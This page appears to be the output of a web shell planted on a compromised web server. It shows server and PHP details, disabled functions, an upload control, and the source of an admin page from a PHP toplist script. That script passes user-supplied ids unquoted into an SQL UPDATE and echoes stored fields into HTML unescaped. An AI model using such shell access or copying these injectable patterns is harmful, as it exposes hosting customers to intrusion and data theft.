HEX
Server: Apache/2.4.25 (Debian)
System: Linux server17 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User: web37 (1062)
PHP: 7.4.30
Disabled: show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, disk_total_space, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen
$ pwd: /var/www/web37/htdocs/arschficken/admin/
Upload Files
File: /var/www/web37/htdocs/arschficken/admin/accounts.php
<?php
############################################
### Top-XL - Change User Data changeuser.php 
############################################
/// 1. You are NOT entiteld to rent, lease, transfer, reproduce or distribute this Software.
/// 2. You are entiteld to adapt, and modify the Software to your need.
/// 3. You can use this Script on all of YOUR Domains.
/// 4. Any modification or removal to the links in the footer and member area shall terminate this license immediately .
/// 5. The Script has been tested on different Servers and found free of any notable errors by the author. The Author shall not in any case be liable for any special, incidental indirect or other similar damages arising from the use of this Script.
/// 6. Author: Simon Zehender - Contact: https://www.paddelberg.de
////////////////////////////////////////////
////////////////////////////////////////////
if ($scriptpath!=$_SERVER['DOCUMENT_ROOT'])
	{
	echo "Are you looking for something?";
	exit ();
	}
$start = !empty ($_GET["start"]) && is_numeric ($_GET["start"]) ? $_GET["start"] : 0;
$show = !empty ($_GET["show"]) ? safety ($_GET["show"]) : '';
$sorter = !empty ($_GET["sorter"]) ? safety ($_GET["sorter"]) : '';
$_POST["accountsspersite"] = !empty ($_POST["accountsspersite"]) ? safety ($_POST["accountsspersite"]) : '';

$accountsspersite = check_accountspersite ($_POST["accountsspersite"], $config['linkspersite'], $show);

if ($show=="toplike" && empty ($accountsspersite))
	{$accountsspersite=$config['linkspersite'];}	

$ids = '';

if ($do=="userchange")
	{
	$ids=safety($_POST["ids"]);
	$ids=trim($ids);
	$ids=addslashes($ids);
	$ids=substr($ids, 0, -1);
	$ids=explode(",",$ids);
	$max=(count($ids));
	for ($i= 0; $i<=$max; $i++) 
		{
		$status=safety($_POST[$ids[$i]]);
		if ($status=="yes")
			{$db -> query ("UPDATE ".$topxl_user_table." SET active='no' WHERE id=".$ids[$i]);}
		}
	
	header ("Location: index.php?do=user&sorter=".$sorter."&show=".$show."&start=".$start."&accountsspersite=".$accountsspersite);
	exit ();
	}

$sortid="idasc";
$sorturl="urlasc";
$sortin="indesc";
$sortout="outdesc";
$sorttin="tindesc";
$sorttout="toutdesc";
if ($sorter=="iddesc")
	{$sqlholder="ORDER BY id DESC";}
elseif ($sorter=="urldesc")
	{$sqlholder="ORDER BY url DESC";}
elseif ($sorter=="urlasc")
	{
	$sqlholder="ORDER BY url ASC";
	$sorturl="urldesc";
	}
elseif ($sorter=="indesc")
	{
	$sqlholder="ORDER BY hitin DESC";
	$sortin="inasc";
	}		
elseif ($sorter=="inasc")
	{$sqlholder="ORDER BY hitin ASC";}
elseif ($sorter=="outdesc")
	{
	$sqlholder="ORDER BY hitout DESC";
	$sortout="outasc";
	}		
elseif ($sorter=="outasc")
	{$sqlholder="ORDER BY hitout ASC";}
elseif ($sorter=="tindesc")
	{
	$sqlholder="ORDER BY hitintotal DESC";
	$sorttin="tinasc";
	}		
elseif ($sorter=="tinasc")
	{$sqlholder="ORDER BY hitintotal ASC";}
elseif ($sorter=="toutdesc")
	{
	$sqlholder="ORDER BY hitouttotal DESC";
	$sorttout="toutasc";
	}		
elseif ($sorter=="toutasc")
	{$sqlholder="ORDER BY hitouttotal ASC";}
else {
	$sqlholder="ORDER BY id ASC";
	$sortid="iddesc";
	}

if ($show=="toplike")
	{
	$sqllastactive = '';
	if ($config['sorting']=="out")
		{
		$sqlorder="ORDER BY hitout";
		$sqlwhere="hitout>='".$config['hitsneeded']."'";
		}
	if ($config['sorting']=="outtotal")
		{
		$sqlorder="ORDER BY hitouttotal";
		$sqlwhere="hitouttotal>='".$config['hitsneeded']."'";
		}	
	if ($config['sorting']=="intotal")
		{
		$sqlorder="ORDER BY hitintotal";
		$sqlwhere="hitintotal>='".$config['hitsneeded']."'";
		}	
	if ($config['sorting']=="in")
		{
		$sqlorder="ORDER BY hitin";
		$sqlwhere="hitin>='".$config['hitsneeded']."'";
		}
	if ($config['onlyactive']=="yes")
		{
		$timestamp=time();
		$inacttime=$timestamp-$config['inactivetime'];
		$sqllastactive=" and lastactive>='".$inacttime."'";
		}
	
	$db -> query ("SELECT COUNT(id) as cnt from ".$topxl_user_table." WHERE active='yes' and ".$sqlwhere.$sqllastactive);
	$row = $db -> fetch ();
	$allusers=$row["cnt"]; 
	}

else
	{
	$db -> query ("SELECT COUNT(id) as cnt FROM ".$topxl_user_table." WHERE active='yes'"); 
	$row = $db -> fetch ();
	$allusers=$row["cnt"];
	}

// the page-forward and backward links, and the pages to click on
$menu = '';
if ($row["cnt"] > $accountsspersite)
	{
	$max=$row["cnt"]/$accountsspersite;
	$max=ceil($max);
	$next=0;

	for($i=0; $i < $max; $i++)
		{
		if ($next==$start)
			{$menu.="";}
		else
			{
			if (empty ($next))
				{$menu.="<a href=\"index.php?do=user&sorter=".$sorter."&show=".$show."&accountsspersite=".$accountsspersite."\"><b>1</b></a> ";}
			
			else
				{
				$nextsite=$i+1;
				$menu.="<a href=\"index.php?do=user&start=".$next."&accountsspersite=".$accountsspersite."&sorter=".$sorter."&show=".$show."\"><b>".$nextsite."</b></a> ";
				}
			}

		$next=$next+$accountsspersite;
		}
	}

$next=$start;
$rowmarker=0;
$now=time();
$inactivetime1=$now-($config['inactivetime']);

if ($show=="toplike")
	{$colspan=11;}

else 
	{$colspan=12;}	

$main_content='
	<form name="form1" method="post" action="index.php?do=user&sorter="'.$sorter.'&show='.$show.'&start='.$start.'">
	<table width="874" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
		<tr>
			<td height="35" colspan="'.$colspan.'" bgcolor="#FFFFFF" class="top"><strong class="heading">'.$text_allvalidusers.'</strong></td>
		</tr>';

if ($show=="toplike")
	{
	$fromsite="user&show=toplike";
	$main_content.="
	<tr>
		<td height=\"35\" colspan=\"11\" bgcolor=\"#FFFFFF\" class=\"top\" style=\"padding:0px;\">
			<table width=\"872\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
				<tr>
					<td height=\"20\" width=\"427\" bgcolor=\"#FFFFFF\" align=\"left\" valign=\"middle\" class=\"top\" style=\"border-right:1px solid #CCCCCC;\">
					<a href=\"index.php?do=active\"><strong>".$text_active1."</strong></a> | 
					<a href=\"index.php?do=inactive\"><strong>".$text_inactiveuser."</strong></a>  | 
					<a href=\"index.php?do=search\"><strong>".$text_searchaccount."</strong></a> 
					</td>
					<td width=\"269\" bgcolor=\"#FFFFFF\" align=\"center\" valign=\"middle\">
					<strong>".$text_show."</strong>
					<input type=\"text\" name=\"accountsspersite\" value=\"".$accountsspersite."\" style=\"width:25px;height:16px;\"> <strong>".$text_persite."</strong> 
					<input name=\"submit\" type=\"submit\" class=\"submitbuton\" value=\"".$text_submit."\" style=\"width:80px;height:22px;\"> 
					</td>  
					<td width=\"183\" bgcolor=\"#FFFFFF\" align=\"left\" valign=\"middle\" class=\"top\" style=\"border-left:1px solid #CCCCCC;\">
					<strong>".$text_sitemenu."</strong> $menu
					</td>
				</tr>
			</table>
		</td>
	</tr>
	</form>
	<form name=\"form1\" method=\"post\" action=\"index.php?do=userchange&show=".$show."&accountsspersite=".$accountsspersite."&start=".$start."&sorter=".$sorter."\">
	<tr>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"center\">".$text_rank."</td>
		<td width=\"462\" bgcolor=\"#E4E4E4\" align=\"center\">".$text_titledesc."</td>
		<td width=\"45\" bgcolor=\"#E4E4E4\" align=\"center\" nowrap>".$text_in."</td>
		<td width=\"45\" bgcolor=\"#E4E4E4\" align=\"center\" nowrap>".$text_out."</td>
		<td width=\"30\" bgcolor=\"#E4E4E4\" align=\"center\" nowrap>".$text_active."</td>
		<td width=\"35\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap>".$text_id."</td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap>".$text_email."</td>
		<td width=\"45\" bgcolor=\"#E4E4E4\" align=\"right\"><a href=\"index.php?do=validate\">".$text_status."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"center\">".$text_edit."</td>
	</tr>";

	$rank=$start;
	$bannershow=0;

	$db -> query("SELECT * from ".$topxl_user_table." WHERE active='yes' and ".$sqlwhere.$sqllastactive." ".$sqlorder." DESC LIMIT ".$start.",".$config['linkspersite']);

	while ($usergetrows = $db -> fetch ())
		{
		$rowmarker++;
		if ($rowmarker==2)
			{$tdbgcolor="bgcolor=\"#F7F7F7\"";$rowmarker=0;}
		else
			{$tdbgcolor="bgcolor=\"#FFFFFF\"";}	

		if ($usergetrows['lastactive']>$inactivetime1)
			{$aktivecheck=$text_yes;}
		else 
			{$aktivecheck=$text_no;}
		$ids.=$usergetrows['id'].",";
		$rank++;
		$bannershow++;
		$main_content.="
		<tr>
			<td ".$tdbgcolor." align=\"center\" valign=\"middle\" height=\"45\"><b>".$rank."</b></td>
			<td ".$tdbgcolor." align=\"center\" valign=\"top\"><a href=\"".stripslashes ($usergetrows['url'])."\" title=\"".$usergetrows['id']." ".stripslashes ($usergetrows['title'])."\" target=\"_blank\" class=\"titlelink\"><strong>".stripslashes ($usergetrows['title'])."</strong></a><br>";
		if ($config['showbanner']=="yes")
			{
			if ($config['bannerrows'] >= $bannershow)
				{$main_content.="<a href=\"".stripslashes ($usergetrows['url'])."\" target=\"_blank\"><img width=\"468\" height=\"60\" src=\"".stripslashes ($usergetrows['bannerurl'])."\" alt=\"".stripslashes ($usergetrows['id'])." ".stripslashes ($usergetrows['title'])."\" border=\"0\" class=\"banner\" vspace=\"2\" hspace=\"2\"></a>";}
			}
		$main_content.="<div align=\"justify\" class=\"description\">".stripslashes ($usergetrows['description'])."</div></td>
		<td ".$tdbgcolor." align=\"center\" valign=\"middle\">".$usergetrows['hitin']."<br>".$usergetrows['hitintotal']."</td>
		<td ".$tdbgcolor." align=\"center\" valign=\"middle\">".$usergetrows['hitout']."<br>".$usergetrows['hitouttotal']."</td>
		<td ".$tdbgcolor." align=\"center\">".$aktivecheck."</td>
		<td ".$tdbgcolor." align=\"right\">".$usergetrows['id']."</td>
		<td ".$tdbgcolor." align=\"right\"><a href=\"mailto:".stripslashes ($usergetrows['email'])."\" target=\"_blank\">".$text_email."</a></td>
		<td ".$tdbgcolor." align=\"right\">
		<select name=\"".$usergetrows['id']."\">
		<option value=\"no\">".$text_no."</option>
		<option value=\"yes\">".$text_yes."</option>
		</select>
		</td>
		<td ".$tdbgcolor." align=\"center\">
		<a href=\"index.php?do=editaccount&id=".$usergetrows['id']."&fromsite=".$fromsite."\">".$text_edit."</a><br>
		<a href=\"".$config['topsiteurl']."/members/index.php?do=main&id=".$usergetrows['id']."\" target=\"_blank\">".$text_show."</a><br>
		<a href=\"index.php?do=delete&id=".$usergetrows['id']."&fromsite=".$fromsite."\">".$text_del."</a></td>
		</tr>";
		}		
	}

else
	{
	$fromsite="user";
	$main_content.="
	<tr>
		<td height=\"20\" colspan=\"2\" bgcolor=\"#FFFFFF\" align=\"left\" valign=\"middle\" class=\"top\">
		<a href=\"index.php?do=active\"><strong>".$text_active1."</strong></a> |
		<a href=\"index.php?do=inactive\"><strong>".$text_inactiveuser."</strong></a> |
		<a href=\"index.php?do=search\"><strong>".$text_searchaccount."</strong></a> | 
		<a href=\"index.php?do=user&show=toplike\"><strong>".$text_showtopsitelike."</strong></a> 
		</td>
		<td height=\"20\" colspan=\"6\" bgcolor=\"#FFFFFF\" align=\"center\" valign=\"middle\">
		<strong>".$text_show."</strong> 
		<input type=\"text\" name=\"accountsspersite\" value=\"".$accountsspersite."\" style=\"width:25px;height:16px;\"> <strong>".$text_persite."</strong> 
		<input name=\"submit\" type=\"submit\" style=\"width:80px;height:22px;\" value=\"".$text_submit."\"> 
		</td>
		<td colspan=\"4\" bgcolor=\"#FFFFFF\" align=\"left\" valign=\"middle\" class=\"top\">
		<strong>".$text_sitemenu."</strong> ".$menu."
		</td>
	</tr>
	</form>
	<form name=\"form1\" method=\"post\" action=\"index.php?do=userchange&accountsspersite=".$accountsspersite."&sorter=".$sorter."&start=".$start."\">
	<tr>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\">
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sortid."\">".$text_id."</a></td>
		<td width=\"380\" bgcolor=\"#E4E4E4\" align=\"center\">
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sorturl."\">".$text_url."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\">
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sortin."\">".$text_in."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap>
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sortout."\">".$text_out."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap>
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sorttin."\">".$text_totalins."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap>
		<a href=\"index.php?do=user&accountsspersite=".$accountsspersite."&sorter=".$sorttout."\">".$text_totalouts."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\" nowrap><a href=\"index.php?do=active\">".$text_active."</a></td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\">Email</td>
		<td width=\"55\" bgcolor=\"#E4E4E4\" align=\"center\"><a href=\"index.php?do=validate\">".$text_status."</a></td>
		<td width=\"30\" bgcolor=\"#E4E4E4\" align=\"right\">".$text_del."</td>
		<td width=\"30\" bgcolor=\"#E4E4E4\" align=\"right\">".$text_edit."</td>
		<td width=\"40\" bgcolor=\"#E4E4E4\" align=\"right\">".$text_show."</td>
	</tr>";

	$db -> query("SELECT * FROM ".$topxl_user_table." WHERE active='yes' ".$sqlholder." LIMIT ".$start.",".$accountsspersite);

	while ($usergetrows = $db -> fetch ())
		{		
		$rowmarker++;
		if ($rowmarker==2)
			{$tdbgcolor="bgcolor=\"#F7F7F7\"";$rowmarker=0;}
		else
			{$tdbgcolor="bgcolor=\"#FFFFFF\"";}		
		if($usergetrows['lastactive']>$inactivetime1)
			{$aktivecheck=$text_yes;}
		else 
			{$aktivecheck=$text_no;}
		$ids.=$usergetrows['id'].",";
		$main_content.="
		<tr>
			<td ".$tdbgcolor." align=\"right\">".$usergetrows['id']."</td>
			<td ".$tdbgcolor." nowrap><div id=\"Layer1\" style=\"position:relativ; width:340px; height:22px; z-index:1; overflow: hidden;\"><a href=\"".stripslashes ($usergetrows['url'])."\" target=\"_blank\">".stripslashes ($usergetrows['url'])."</a></div></td>
			<td ".$tdbgcolor." align=\"right\">".$usergetrows['hitin']."</td>
			<td ".$tdbgcolor." align=\"right\">".$usergetrows['hitout']."</td>
			<td ".$tdbgcolor." align=\"right\">".$usergetrows['hitintotal']."</td>
			<td ".$tdbgcolor." align=\"right\">".$usergetrows['hitouttotal']."</td>
			<td ".$tdbgcolor." align=\"right\">".$aktivecheck."</td>
			<td ".$tdbgcolor." align=\"right\"><a href=\"mailto:".$usergetrows['email']."\" target=\"_blank\">".$text_email."</a></td>
			<td ".$tdbgcolor." align=\"right\">
			<select name=\"".$usergetrows['id']."\">
			<option value=\"no\">".$text_no."</option>
			<option value=\"yes\">".$text_yes."</option>
			</select>
			</td>
			<td ".$tdbgcolor." align=\"right\"><a href=\"index.php?do=delete&id=".$usergetrows['id']."&fromsite=".$fromsite."\">".$text_del."</a></td>
			<td ".$tdbgcolor." align=\"right\"><a href=\"index.php?do=editaccount&id=".$usergetrows['id']."&fromsite=".$fromsite."\">".$text_edit."</a></td>
			<td ".$tdbgcolor." align=\"right\"><a href=\"".$config['topsiteurl']."/members/index.php?do=main&id=".$usergetrows['id']."\" target=\"_blank\">".$text_show."</a></td>
		</tr>";
		}
	}

$main_content.='
			<tr>
				<td height="42" colspan="'.$colspan.'" bgcolor="#FFFFFF" align="right"><input type="hidden" name="ids" value="'.$ids.'"><input name="submit" type="submit" class="submitbuton" value="'.$text_submit.'"></td>
			</tr>
	</table>
	</form>';

/// Template 
if(!file_exists($file))
	{
	echo "The template ".$file." does not exist.";
	exit ();
	}

$fp1=fopen($file,"r");  
$zeile=fread ($fp1, filesize ($file));
include("template.php");

echo $zeile;

exit ();
?>
@ Telegram